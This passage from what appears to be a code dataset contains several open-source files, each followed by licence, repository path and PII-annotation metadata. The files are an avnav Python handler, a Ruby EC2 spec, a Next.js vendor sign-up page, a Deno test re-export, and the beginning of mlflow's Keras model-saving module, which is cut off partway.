filePath=self.httpServer.tryExternalMappings(path,query)
if filePath is None or not os.path.exists(filePath):
return None
return filePath
def findChild(self,name,ignoreInvalid=False):
children=self.param.get(self.CHILDNAME)
if children is None:
return -1
if not isinstance(children,list):
return -1
for i in range(0,len(children)):
child =children[i]
if child.get('name') == name:
if ignoreInvalid:
inList=[e for e in self.addonList if e.get('name') == name and not ( e.get('invalid') == True)]
if len(inList) < 0:
return -1
return i
return -1
def getChildConfig(self,name):
idx=self.findChild(name)
if idx < 0:
return {}
else:
return self.param[self.CHILDNAME][idx]
def handleDelete(self,name):
if name is None:
raise Exception("missing name")
name = AVNUtil.clean_filename(name)
idx=self.findChild(name)
if idx < 0:
raise Exception("unable to find %s"%name)
self.removeChildConfig(self.CHILDNAME,idx)
self.fillList()
def handleList(self,httpHandler,includeInvalid):
host = httpHandler.headers.get('host')
hostparts = host.split(':')
outdata=[]
src=self.additionalAddOns+self.addonList
for addon in src:
if addon.get('invalid') == True and not includeInvalid:
continue
item=addon.copy()
if hostparts is not None:
item['originalUrl']=addon['url']
item['url'] = addon['url'].replace('$HOST', hostparts[0])
outdata.append(item)
rt = AVNUtil.getReturnData(items=outdata)
return rt
def getHandledCommands(self):
rt={"api": self.TYPE, "list": self.TYPE, "delete": self.TYPE}
prefix=self.getPrefix()
if prefix is not None:
rt["path"]=prefix
return rt
def checkName(self,name,doRaise=True):
cleanName=AVNUtil.clean_filename(name)
if name != cleanName:
if doRaise:
raise Exception("name %s is invalid"%name)
return False
return True
def registerAddOn(self,name,url,iconPath,title=None):
newAddon = {
'name': name,
'url': url,
'icon': iconPath,
'title': title,
'canDelete': False,
'source':'plugin'
}
self.additionalAddOns.append(newAddon)
def unregisterAddOn(self,name):
if name is None:
raise Exception("name cannot be None")
for ao in self.additionalAddOns:
if ao.get('name') == name:
self.additionalAddOns.remove(ao)
return True
def deleteByUrl(self,url):
"""
called by the user handler when a user file is deleted
@param url:
@return:
"""
if url is None:
return
for addon in self.addonList:
if addon.get('canDelete') == True and addon.get('url') == url:
self.handleDelete(addon.get('name'))
def handleApiRequest(self, type, subtype, requestparam, **kwargs):
if type == 'api':
command=AVNUtil.getHttpRequestParam(requestparam,'command',True)
name=AVNUtil.getHttpRequestParam(requestparam,'name',False)
if command == 'delete':
self.handleDelete(name)
return AVNUtil.getReturnData()
elif command == 'list':
includeInvalid = AVNUtil.getHttpRequestParam(requestparam, "invalid")
return self.handleList(kwargs.get('handler'),includeInvalid is not None and includeInvalid.lower() == 'true')
elif command == 'update':
url=AVNUtil.getHttpRequestParam(requestparam,'url',True)
icon=AVNUtil.getHttpRequestParam(requestparam,'icon',True)
title=AVNUtil.getHttpRequestParam(requestparam,'title')
param = {}
param['icon'] = icon
param['title'] = title
param['url'] = url
param['keepUrl'] = url.startswith("http")
doAdd=False
if name is None:
doAdd=True
name=self.computeKey(param)
#add
for entry in self.addonList:
if entry['name'] == name:
raise Exception("trying to add an already existing url %s"%url)
param['name']=name
if not url.startswith("http"):
userFile=self.findFileForUrl(url)
if userFile is None:
raise Exception("unable to find a local file for %s"%url)
if not icon.startswith("http"):
iconFile=self.findFileForUrl(icon)
if iconFile is None:
raise Exception("unable to find an icon file for %s"%icon)
idx=self.findChild(name)
if idx < 0 and not doAdd:
raise Exception("did not find a user app with this name")
for k in list(param.keys()):
idx=self.changeChildConfig(self.CHILDNAME,idx,k,param[k],True)
self.writeConfigChanges()
self.fillList()
return AVNUtil.getReturnData()
raise Exception("unknown command for %s api request: %s"%(self.type,command))
if type == "list":
includeInvalid=AVNUtil.getHttpRequestParam(requestparam,"invalid")
return self.handleList(kwargs.get('handler'),includeInvalid is not None and includeInvalid.lower() == 'true')
if type == 'delete':
name = AVNUtil.getHttpRequestParam(requestparam, "name",True)
self.handleDelete(name)
return AVNUtil.getReturnData()
raise Exception("unable to handle user request %s"%(type))
# make the handler known to the AVNav server so it gets instantiated at startup
avnav_handlerList.registerHandler(AVNUserAppHandler)
|
Python
|
MIT
|
Littlechay/avnav/server/handler/avnuserapps.py
|
6a6d190a-071d-496d-8be3-9665b7913424
|
[{"tag": "EMAIL", "value": "andreas@wellenvogel.net", "start": 172, "end": 195, "context": "####\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Matt Hawkins", "start": 1492, "end": 1504, "context": "https://github.com/free-x\n# parts contributed by Matt Hawkins http://www.raspberrypi-spy.co.uk/\n#\n#############"}, {"tag": "NAME", "value": "Andreas Vogel", "start": 158, "end": 171, "context": "##################\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby"}]
|
[{"tag": "EMAIL", "value": "andreas@wellenvogel.net", "start": 172, "end": 195, "context": "####\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby granted, free of charge"}, {"tag": "NAME", "value": "Matt Hawkins", "start": 1492, "end": 1504, "context": "https://github.com/free-x\n# parts contributed by Matt Hawkins http://www.raspberrypi-spy.co.uk/\n#\n#############"}, {"tag": "NAME", "value": "Andreas Vogel", "start": 158, "end": 171, "context": "##################\n# Copyright (c) 2012,2013-2021 Andreas Vogel andreas@wellenvogel.net\n#\n# Permission is hereby"}]
|
require File.dirname(__FILE__) + '/../../spec_helper'
# include Remote
# Minimal EC2-backed remoter used as the fixture for the specs below.
# Every cloud setting is stubbed to a fixed value so no real AWS
# credentials or API calls are needed.
class TestEC2Class
  include PoolParty::Remote::RemoterBase
  include Ec2
  include CloudResourcer
  include CloudDsl

  def keypair
    "fake_keypair"
  end

  def ami
    "ami-abc123"
  end

  def size
    "small"
  end

  def security_group
    "default"
  end

  def ebs_volume_id
    "ebs_volume_id"
  end

  # NOTE(review): keeps the original spelling ("availabilty") because the
  # mixins look the setting up under exactly this method name.
  def availabilty_zone
    "us-east-1a"
  end

  def verbose
    false
  end

  # Memoized EC2 client built with dummy credentials.
  def ec2
    @ec2 ||= EC2::Base.new(:access_key_id => "not_an_access_key", :secret_access_key => "not_a_secret_access_key")
  end
end
describe "ec2 remote base" do
  before(:each) do
    setup
    @tr = TestEC2Class.new
    stub_remoter_for(@tr)
    # canned instance list so no AWS call is ever made
    @tr.stub!(:get_instances_description).and_return response_list_of_instances
  end
  # generate one respond_to? spec per public remote-base method
  %w(launch_new_instance! terminate_instance! describe_instance describe_instances create_snapshot).each do |method|
    eval <<-EOE
      it "should have the method #{method}" do
        @tr.respond_to?(:#{method}).should == true
      end
    EOE
  end
  describe "helpers" do
    it "should be able to convert an ec2 ip to a real ip" do
      "ec2-72-44-36-12.compute-1.amazonaws.com".convert_from_ec2_to_ip.should == "72.44.36.12"
    end
    it "should not throw an error if another string is returned" do
      "72.44.36.12".convert_from_ec2_to_ip.should == "72.44.36.12"
    end
    it "should be able to parse the date from the timestamp" do
      "2008-11-13T09:33:09+0000".parse_datetime.should == DateTime.parse("2008-11-13T09:33:09+0000")
    end
    it "should rescue itself and just return the string if it fails" do
      "thisisthedate".parse_datetime.should == "thisisthedate"
    end
  end
  describe "launching" do
    before(:each) do
      @tr.ec2.stub!(:run_instances).and_return true
    end
    it "should call run_instances on the ec2 Base class when asking to launch_new_instance!" do
      @tr.ec2.should_receive(:run_instances).and_return true
      @tr.launch_new_instance!
    end
    it "should use a specific security group if one is specified" do
      @tr.stub!(:security_group).and_return "web"
      @tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['web'])).and_return true
      @tr.launch_new_instance!
    end
    it "should use the default security group if none is specified" do
      @tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['default'])).and_return true
      @tr.launch_new_instance!
    end
    it "should get the hash response from EC2ResponseObject" do
      EC2ResponseObject.should_receive(:get_hash_from_response).and_return true
      @tr.launch_new_instance!
    end
  end
  describe "terminating" do
    it "should call terminate_instance! on ec2 when asking to terminate_instance!" do
      @tr.ec2.should_receive(:terminate_instances).with(:instance_id => "abc-123").and_return true
      @tr.terminate_instance!("abc-123")
    end
  end
  describe "describe_instance" do
    it "should call get_instances_description on itself" do
      @tr.should_receive(:get_instances_description).and_return {}
      @tr.describe_instance
    end
  end
  # names derive from the canned response_list_of_instances fixture
  describe "get_instances_description" do
    it "should return a hash" do
      @tr.describe_instances.class.should == Array
    end
    it "should call the first node master" do
      @tr.describe_instances.first[:name].should == "master"
    end
    it "should call the second one node1" do
      @tr.describe_instances[1][:name].should == "node1"
    end
    it "should call the third node2" do
      @tr.describe_instances[2][:name].should == "terminated_node2"
    end
  end
  describe "create_keypair" do
    before(:each) do
      Kernel.stub!(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
    end
    it "should send system to the Kernel" do
      Kernel.should_receive(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
      @tr.create_keypair
    end
    it "should try to create the directory when making a new keypair" do
      FileUtils.should_receive(:mkdir_p).and_return true
      ::File.stub!(:directory?).and_return false
      @tr.create_keypair
    end
    it "should not create a keypair if the keypair is nil" do
      Kernel.should_not_receive(:system)
      @tr.stub!(:keypair).and_return nil
      @tr.create_keypair
    end
  end
  describe "create_snapshot" do
    # We can assume that create_snapshot on the ec2 gem works
    before(:each) do
      @tr.ec2.stub!(:create_snapshot).and_return nil
    end
    it "should create a snapshot of the current EBS volume" do
      @tr.ec2.stub!(:create_snapshot).and_return {{"snapshotId" => "snap-123"}}
      @tr.stub!(:ebs_volume_id).and_return "vol-123"
      @tr.create_snapshot.should == {"snapshotId" => "snap-123"}
    end
    it "should not create a snapshot if there is no EBS volume" do
      @tr.create_snapshot.should == nil
    end
  end
end
|
Ruby
|
MIT
|
joerichsen/poolparty/spec/poolparty/net/remote_bases/ec2_spec.rb
|
9ed27b97-d674-4161-9aa4-1af798a52090
|
[{"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1336, "end": 1347, "context": " \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n end\n it \"should be able to parse the date"}, {"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1289, "end": 1300, "context": "an error if another string is returned\" do\n \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n "}]
|
[{"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1336, "end": 1347, "context": " \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n end\n it \"should be able to parse the date"}, {"tag": "IP_ADDRESS", "value": "72.44.36.12", "start": 1289, "end": 1300, "context": "an error if another string is returned\" do\n \"72.44.36.12\".convert_from_ec2_to_ip.should == \"72.44.36.12\"\n "}]
|
import type { CustomNextPage } from "next";
import { useState } from "react";
import { useForm } from "react-hook-form";
import { useManageAccount } from "src/hook/vendor/useManageAccount";
import { Layout } from "src/layout";
import {
Attention,
InputLayout,
InputType,
} from "src/pages/vendor/auth/component";
import type {
TypeEmail,
TypeRadio,
TypeSelect,
TypeTel,
TypeText,
TypeTextarea,
TypeUrl,
} from "src/type/vendor";
import type Stripe from "stripe";
// Form field definitions rendered by the Create page below.
// Only the email field is currently active; the commented-out entries are
// prepared fields (name, business type/category) for later onboarding steps.
const inputItems: (
  | TypeEmail
  | TypeRadio
  | TypeSelect
  | TypeTel
  | TypeText
  | TypeUrl
  | TypeTextarea
)[] = [
  // {
  //   id: "business_type",
  //   label: "事業形態",
  //   type: "radio",
  //   radioItem: [{ id: "individual" }, { id: "company" }, { id: "non_profit" }],
  // },
  // {
  //   id: "first_name_kanji",
  //   label: "氏名",
  //   type: "text",
  //   placeholder: "姓",
  // },
  // {
  //   id: "last_name_kanji",
  //   label: "氏名",
  //   type: "text",
  //   placeholder: "名",
  // },
  // {
  //   id: "first_name_kana",
  //   label: "氏名(かな)",
  //   type: "text",
  //   placeholder: "姓",
  // },
  // {
  //   id: "last_name_kana",
  //   label: "氏名(かな)",
  //   type: "text",
  //   placeholder: "名",
  // },
  {
    id: "email",
    label: "メールアドレス",
    type: "email",
    autoComplete: "email",
    placeholder: "test.satou@example.com",
  },
  // {
  //   id: "businessProfileMcc",
  //   label: "事業カテゴリー",
  //   type: "select",
  //   selectItem: [
  //     { value: "", text: "選んでください。" },
  //     { value: "Dog", text: "Dog" },
  //     { value: "Cat", text: "Cat" },
  //     { value: "Bird", text: "Bird" },
  //   ],
  // },
  // {
  //   id: "businessProfileProductDescription",
  //   label: "事業詳細",
  //   type: "textarea",
  // },
];
/**
 * Vendor onboarding page: collects account details via react-hook-form,
 * creates a Stripe connected account and then redirects the vendor to the
 * Stripe account-link flow. A spinner overlays the submit button while the
 * async calls are in flight.
 */
const Create: CustomNextPage = () => {
  const [isLoading, setIsLoading] = useState(false);
  const { createAccount, createAccountLink } = useManageAccount();
  const {
    register,
    handleSubmit,
    formState: { errors },
  } = useForm();

  // Create the account first, then request the onboarding link for it.
  const onSubmit = async (formValues: any) => {
    setIsLoading(true);
    const params: Stripe.AccountCreateParams = { ...formValues };
    const created = await createAccount(params);
    await createAccountLink(created.id);
    setIsLoading(false);
  };

  const fields = inputItems.map((item) => (
    <InputLayout key={item.id} item={item} errorMessage={errors}>
      <InputType item={item} register={register} />
    </InputLayout>
  ));

  return (
    <div className="mx-auto max-w-[700px] text-center">
      <div className="space-y-3">
        <h2>チケットオーナーアカウント作成</h2>
        <Attention />
        <div className="p-10 rounded-lg border border-gray">
          <form onSubmit={handleSubmit(onSubmit)} className="text-center">
            {fields}
            <div className="relative py-2 px-5">
              <input type="submit" value="送信" />
              {isLoading && (
                <div className="flex absolute inset-0 justify-center bg-white">
                  <div className="w-5 h-5 rounded-full border-4 border-blue border-t-transparent animate-spin"></div>
                </div>
              )}
            </div>
          </form>
        </div>
      </div>
    </div>
  );
};

Create.getLayout = Layout;

export default Create;
|
TypeScript
|
MIT
|
yu-Yoshiaki/Ticketia/src/pages/vendor/auth/create.page.tsx
|
2cc29e0f-e1f0-47ac-af0d-0d5587e1f1cb
|
[{"tag": "EMAIL", "value": "test.satou@example.com", "start": 1338, "end": 1360, "context": "il\",\n autoComplete: \"email\",\n placeholder: \"test.satou@example.com\",\n },\n // {\n // id: \"businessProfileMcc\",\n "}]
|
[{"tag": "EMAIL", "value": "test.satou@example.com", "start": 1338, "end": 1360, "context": "il\",\n autoComplete: \"email\",\n placeholder: \"test.satou@example.com\",\n },\n // {\n // id: \"businessProfileMcc\",\n "}]
|
// Re-export the Deno std assertion helpers (assertEquals, assertThrows, ...)
// pinned to std@0.142.0 so every test file uses the same version.
export * from 'https://deno.land/std@0.142.0/testing/asserts.ts';
|
TypeScript
|
MIT
|
Azulamb/minirachne/tests/_setup.ts
|
08b21444-41cd-466e-bc66-a391f37b1bb1
|
[]
|
[]
|
"""
The ``mlflow.keras`` module provides an API for logging and loading Keras models. This module
exports Keras models with the following flavors:
Keras (native) format
This is the main flavor that can be loaded back into Keras.
:py:mod:`mlflow.pyfunc`
Produced for use by generic pyfunc-based deployment tools and batch inference.
"""
import importlib
import os
import yaml
import gorilla
import tempfile
import shutil
import pandas as pd
from distutils.version import LooseVersion
from mlflow import pyfunc
from mlflow.models import Model
import mlflow.tracking
from mlflow.exceptions import MlflowException
from mlflow.models.signature import ModelSignature
from mlflow.models.utils import ModelInputExample, _save_example
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.utils.environment import _mlflow_conda_env
from mlflow.utils.model_utils import _get_flavor_configuration
from mlflow.utils.annotations import experimental
from mlflow.utils.autologging_utils import try_mlflow_log, log_fn_args_as_params
# Flavor name under which this module registers models in the MLmodel file
FLAVOR_NAME = "keras"
# File name to which custom objects cloudpickle is saved - used during save and load
_CUSTOM_OBJECTS_SAVE_PATH = "custom_objects.cloudpickle"
# File name recording which keras module ("keras" or "tensorflow.keras") saved the model
_KERAS_MODULE_SPEC_PATH = "keras_module.txt"
# File name to which keras model is saved
_MODEL_SAVE_PATH = "model.h5"
# Conda env subpath when saving/loading model
_CONDA_ENV_SUBPATH = "conda.yaml"
def get_default_conda_env(include_cloudpickle=False, keras_module=None):
    """
    :return: The default Conda environment for MLflow Models produced by calls to
             :func:`save_model()` and :func:`log_model()`.
    """
    import tensorflow as tf
    # with tf.keras we only need to declare a dependency on tensorflow itself
    conda_deps = []
    pip_deps = []
    if keras_module is None:
        import keras
        keras_module = keras
    if keras_module.__name__ == "keras":
        keras_req = "keras=={}".format(keras_module.__version__)
        # Temporary fix: the created conda environment has issues installing keras >= 2.3.1,
        # so newer versions go through pip instead of conda
        if LooseVersion(keras_module.__version__) < LooseVersion('2.3.1'):
            conda_deps.append(keras_req)
        else:
            pip_deps.append(keras_req)
    if include_cloudpickle:
        import cloudpickle
        pip_deps.append("cloudpickle=={}".format(cloudpickle.__version__))
    # Temporary fix: conda-forge currently does not have tensorflow > 1.14.
    # The Keras pyfunc representation requires the TensorFlow backend, so the
    # environment must include TensorFlow one way or the other.
    tf_req = "tensorflow=={}".format(tf.__version__)
    if LooseVersion(tf.__version__) <= LooseVersion('1.13.2'):
        conda_deps.append(tf_req)
    else:
        pip_deps.append(tf_req)
    return _mlflow_conda_env(
        additional_conda_deps=conda_deps,
        additional_pip_deps=pip_deps,
        additional_conda_channels=None)
def save_model(keras_model, path, conda_env=None, mlflow_model=None, custom_objects=None,
               keras_module=None,
               signature: ModelSignature = None, input_example: ModelInputExample = None,
               **kwargs):
    """
    Save a Keras model to a path on the local file system.

    :param keras_model: Keras model to be saved.
    :param path: Local path where the model is to be saved.
    :param conda_env: Either a dictionary representation of a Conda environment or the path to a
                      Conda environment yaml file. If provided, this describes the environment
                      this model should be run in. At minimum, it should specify the
                      dependencies contained in :func:`get_default_conda_env()`. If
                      ``None``, the default :func:`get_default_conda_env()` environment is
                      added to the model. The following is an *example* dictionary
                      representation of a Conda environment::

                        {
                            'name': 'mlflow-env',
                            'channels': ['defaults'],
                            'dependencies': [
                                'python=3.7.0',
                                'keras=2.2.4',
                                'tensorflow=1.8.0'
                            ]
                        }
    :param mlflow_model: MLflow model config this flavor is being added to.
    :param custom_objects: A Keras ``custom_objects`` dictionary mapping names (strings) to
                           custom classes or functions associated with the Keras model. MLflow saves
                           these custom layers using CloudPickle and restores them automatically
                           when the model is loaded with :py:func:`mlflow.keras.load_model` and
                           :py:func:`mlflow.pyfunc.load_model`.
    :param keras_module: Keras module to be used to save / load the model
                         (``keras`` or ``tf.keras``). If not provided, MLflow will
                         attempt to infer the Keras module based on the given model.
    :param kwargs: kwargs to pass to ``keras_model.save`` method.
    :param signature: (Experimental) :py:class:`ModelSignature <mlflow.models.ModelSignature>`
                      describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
                      The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
                      from datasets with valid model input (e.g. the training dataset with target
                      column omitted) and valid model output (e.g. model predictions generated on
                      the training dataset), for example:

                      .. code-block:: python

                        from mlflow.models.signature import infer_signature
                        train = df.drop_column("target_label")
                        predictions = ...  # compute model predictions
                        signature = infer_signature(train, predictions)
    :param input_example: (Experimental) Input example provides one or several instances of valid
                          model input. The example can be used as a hint of what data to feed the
                          model. The given example will be converted to a Pandas DataFrame and then
                          serialized to json using the Pandas split-oriented format. Bytes are
                          base64-encoded.

    .. code-block:: python
        :caption: Example

        import mlflow
        # Build, compile, and train your model
        keras_model = ...
        keras_model_path = ...
        keras_model.compile(optimizer="rmsprop", loss="mse", metrics=["accuracy"])
        results = keras_model.fit(
            x_train, y_train, epochs=20, batch_size = 128, validation_data=(x_val, y_val))
        # Save the model as an MLflow Model
        mlflow.keras.save_model(keras_model, keras_model_path)
    """
    if keras_module is None:
        # infer which keras flavor (plain keras vs tf.keras) produced the model
        def _is_plain_keras(model):
            try:
                # NB: Network is the first parent with save method
                import keras.engine.network
                return isinstance(model, keras.engine.network.Network)
            except ImportError:
                return False
        def _is_tf_keras(model):
            try:
                # NB: Network is not exposed in tf.keras, we check for Model instead.
                import tensorflow.keras.models
                return isinstance(model, tensorflow.keras.models.Model)
            except ImportError:
                return False
        if _is_plain_keras(keras_model):
            keras_module = importlib.import_module("keras")
        elif _is_tf_keras(keras_model):
            keras_module = importlib.import_module("tensorflow.keras")
        else:
            raise MlflowException("Unable to infer keras module from the model, please specify "
                                  "which keras module ('keras' or 'tensorflow.keras') is to be "
                                  "used to save and load the model.")
    elif type(keras_module) == str:
        keras_module = importlib.import_module(keras_module)
    # check if path exists
    path = os.path.abspath(path)
    if os.path.exists(path):
        raise MlflowException("Path '{}' already exists".format(path))
    # construct new data folder in existing path
    data_subpath = "data"
    data_path = os.path.join(path, data_subpath)
    os.makedirs(data_path)
    if mlflow_model is None:
        mlflow_model = Model()
    if signature is not None:
        mlflow_model.signature = signature
    if input_example is not None:
        _save_example(mlflow_model, input_example, path)
    # save custom objects if there are custom objects
    if custom_objects is not None:
        _save_custom_objects(data_path, custom_objects)
    # save keras module spec to path/data/keras_module.txt
    with open(os.path.join(data_path, _KERAS_MODULE_SPEC_PATH), "w") as f:
        f.write(keras_module.__name__)
    # save keras model to path/data/model.h5
    model_subpath = os.path.join(data_subpath, _MODEL_SAVE_PATH)
    model_path = os.path.join(path, model_subpath)
    if path.startswith('/dbfs/'):
        # The Databricks Filesystem uses a FUSE implementation that does not support
        # random writes. It causes an error.
        with tempfile.NamedTemporaryFile(suffix='.h5') as f:
            keras_model.save(f.name, **kwargs)
            f.flush()  # force flush the data
            shutil.copyfile(src=f.name, dst=model_path)
    else:
        keras_model.save(model_path, **kwargs)
    # update flavor info to mlflow_model
    mlflow_model.add_flavor(FLAVOR_NAME,
                            keras_module=keras_module.__name__,
                            keras_version=keras_module.__version__,
                            data=data_subpath)
    # save conda.yaml info to path/conda.yml
    if conda_env is None:
        conda_env = get_default_conda_env(include_cloudpickle=custom_objects is not None,
                                          keras_module=keras_module)
    elif not isinstance(conda_env, dict):
        with open(conda_env, "r") as f:
            conda_env = yaml.safe_load(f)
    with open(os.path.join(path, _CONDA_ENV_SUBPATH), "w") as f:
        yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
    # append loader_module, data and env data to mlflow_model
    pyfunc.add_to_model(mlflow_model, loader_module="mlflow.keras",
                        data=data_subpath, env=_CONDA_ENV_SUBPATH)
    # save mlflow_model to path/MLmodel
    mlflow_model.save(os.path.join(path, "MLmodel"))
def log_model(keras_model, artifact_path, conda_env=None, custom_objects=None, keras_module=None,
              registered_model_name=None, signature: ModelSignature=None,
              input_example: ModelInputExample=None, **kwargs):
    """
    Log a Keras model as an MLflow artifact for the current run.

    :param keras_model: Keras model to be saved.
    :param artifact_path: Run-relative artifact path.
    :param conda_env: Either a dictionary representation of a Conda environment or
                      the path to a Conda environment yaml file.
                      If provided, this describes the environment this model should be
                      run in. At minimum, it should specify the dependencies
                      contained in :func:`get_default_conda_env()`. If ``None``, the default
                      :func:`mlflow.keras.get_default_conda_env()` environment is added to
                      the model. The following is an *example* dictionary representation of a
                      Conda environment::

                        {
                            'name': 'mlflow-env',
                            'channels': ['defaults'],
                            'dependencies': [
                                'python=3.7.0',
                                'keras=2.2.4',
                                'tensorflow=1.8.0'
                            ]
                        }
    :param custom_objects: A Keras ``custom_objects`` dictionary mapping names (strings) to
                           custom classes or functions associated with the Keras model. MLflow saves
                           these custom layers using CloudPickle and restores them automatically
                           when the model is loaded with :py:func:`mlflow.keras.load_model` and
                           :py:func:`mlflow.pyfunc.load_model`.
    :param keras_module: Keras module to be used to save / load the model
                         (``keras`` or ``tf.keras``). If not provided, MLflow will
                         attempt to infer the Keras module based on the given model.
    :param registered_model_name: (Experimental) If given, create a model version under
                                  ``registered_model_name``, also creating a registered model if one
                                  with the given name does not exist.
    :param signature: (Experimental) :py:class:`ModelSignature <mlflow.models.ModelSignature>`
                      describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
                      The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
                      from datasets with valid model input (e.g. the training dataset with target
                      column omitted) and valid model output (e.g. model predictions generated on
                      the training dataset), for example:

                      .. code-block:: python

                        from mlflow.models.signature import infer_signature
                        train = df.drop_column("target_label")
                        predictions = ...  # compute model predictions
                        signature = infer_signature(train, predictions)
    :param input_example: (Experimental) Input example provides one or several instances of valid
                          model input. The example can be used as a hint of what data to feed the
                          model. The given example will be converted to a Pandas DataFrame and then
                          serialized to json using the Pandas split-oriented format. Bytes are
                          base64-encoded.
    :param kwargs: kwargs to pass to ``keras_model.save`` method.

    .. code-block:: python
        :caption: Example

        from keras.layers import Dense
        import mlflow
        # Build, compile, and train your model
        keras_model = ...
        keras_model.compile(optimizer="rmsprop", loss="mse", metrics=["accuracy"])
        results = keras_model.fit(
            x_train, y_train, epochs=20, batch_size = 128, validation_data=(x_val, y_val))
        # Log metrics and log the model
        with mlflow.start_run() as run:
            mlflow.keras.log_model(keras_model, "models")
    """
    # delegate to Model.log which calls save_model() above and logs the artifact
    Model.log(artifact_path=artifact_path, flavor=mlflow.keras,
              keras_model=keras_model, conda_env=conda_env, custom_objects=custom_objects,
              keras_module=keras_module, registered_model_name=registered_model_name,
              signature=signature, input_example=input_example,
              **kwargs)
def _save_custom_objects(path, custom_objects):
    """
    Save custom objects dictionary to a cloudpickle file so a model can be easily loaded later.

    :param path: An absolute path that points to the data directory within /path/to/model.
    :param custom_objects: Keras ``custom_objects`` is a dictionary mapping
                           names (strings) to custom classes or functions to be considered
                           during deserialization. MLflow saves these custom layers using
                           CloudPickle and restores them automatically when the model is
                           loaded with :py:func:`mlflow.keras.load_model` and
                           :py:func:`mlflow.pyfunc.load_model`.
    """
    import cloudpickle
    target_file = os.path.join(path, _CUSTOM_OBJECTS_SAVE_PATH)
    with open(target_file, "wb") as handle:
        cloudpickle.dump(custom_objects, handle)
def _load_model(model_path, keras_module, **kwargs):
    # Load a Keras model saved by save_model() with the given keras module
    # (plain keras or tf.keras). model_path may be either the model directory
    # (containing model.h5 and optionally pickled custom objects) or the h5
    # file itself; remaining kwargs are forwarded to keras' load_model.
    keras_models = importlib.import_module(keras_module.__name__ + ".models")
    custom_objects = kwargs.pop("custom_objects", {})
    custom_objects_path = None
    if os.path.isdir(model_path):
        if os.path.isfile(os.path.join(model_path, _CUSTOM_OBJECTS_SAVE_PATH)):
            custom_objects_path = os.path.join(model_path, _CUSTOM_OBJECTS_SAVE_PATH)
        model_path = os.path.join(model_path, _MODEL_SAVE_PATH)
    if custom_objects_path is not None:
        import cloudpickle
        with open(custom_objects_path, "rb") as in_f:
            pickled_custom_objects = cloudpickle.load(in_f)
        # caller-provided custom objects take precedence over the pickled ones
        pickled_custom_objects.update(custom_objects)
        custom_objects = pickled_custom_objects
    from distutils.version import StrictVersion
    if StrictVersion(keras_module.__version__.split('-')[0]) >= StrictVersion("2.2.3"):
        # NOTE: Keras 2.2.3 does not work with unicode paths in python2. Pass in h5py.File instead
        # of string to avoid issues.
        import h5py
        with h5py.File(os.path.abspath(model_path), "r") as model_path:
            return keras_models.load_model(model_path, custom_objects=custom_objects, **kwargs)
    else:
        # NOTE: Older versions of Keras only handle filepath.
        return keras_models.load_model(model_path, custom_objects=custom_objects, **kwargs)
class _KerasModelWrapper:
def __init__(self, keras_model, graph, sess):
self.keras_model = keras_model
self._graph = graph
self._sess = sess
def predict(self, dataframe):
# In TensorFlow < 2.0, we use a graph and session to predict
if self._graph is not None:
with self._graph.as_default():
with self._sess.as_default():
predicted = pd.DataFrame(self.keras_model.predict(dataframe.values))
# In TensorFlow >= 2.0, we do not use a graph and session to predict
else:
predicted = pd.DataFrame(self.keras_model.predict(dataframe.values))
predicted.index = dataframe.index
return predicted
def _load_pyfunc(path):
    """
    Load PyFunc implementation. Called by ``pyfunc.load_pyfunc``.

    :param path: Local filesystem path to the MLflow Model with the ``keras`` flavor.
    """
    import tensorflow as tf
    # determine which keras module saved the model; models saved before the
    # spec file existed default to plain keras
    if os.path.isfile(os.path.join(path, _KERAS_MODULE_SPEC_PATH)):
        with open(os.path.join(path, _KERAS_MODULE_SPEC_PATH), "r") as f:
            keras_module = importlib.import_module(f.read())
    else:
        import keras
        keras_module = keras
    K = importlib.import_module(keras_module.__name__ + ".backend")
    if keras_module.__name__ == "tensorflow.keras" or K.backend() == 'tensorflow':
        if LooseVersion(tf.__version__) < LooseVersion('2.0.0'):
            graph = tf.Graph()
            sess = tf.Session(graph=graph)
            # By default tf backed models depend on the global graph and session.
            # We create and use a new Graph and Session and store them with the model.
            # This way the model is independent of the global state.
            with graph.as_default():
                with sess.as_default():  # pylint:disable=not-context-manager
                    K.set_learning_phase(0)
                    m = _load_model(path, keras_module=keras_module, compile=False)
                    return _KerasModelWrapper(m, graph, sess)
        else:
            # TensorFlow >= 2.0: eager mode, no explicit graph/session
            K.set_learning_phase(0)
            m = _load_model(path, keras_module=keras_module, compile=False)
            return _KerasModelWrapper(m, None, None)
    else:
        raise MlflowException("Unsupported backend '%s'" % K._BACKEND)
def load_model(model_uri, **kwargs):
    """
    Load a Keras model from a local file or a run.

    Extra arguments are passed through to ``keras.load_model``.

    :param model_uri: The location, in URI format, of the MLflow model. For example:

                      - ``/Users/me/path/to/local/model``
                      - ``relative/path/to/local/model``
                      - ``s3://my_bucket/path/to/model``
                      - ``runs:/<mlflow_run_id>/run-relative/path/to/model``
                      - ``models:/<model_name>/<model_version>``
                      - ``models:/<model_name>/<stage>``

                      For more information about supported URI schemes, see
                      `Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
                      artifact-locations>`_.

    :return: A Keras model instance.

    .. code-block:: python
        :caption: Example

        # Load persisted model as a Keras model or as a PyFunc, call predict() on a pandas DataFrame
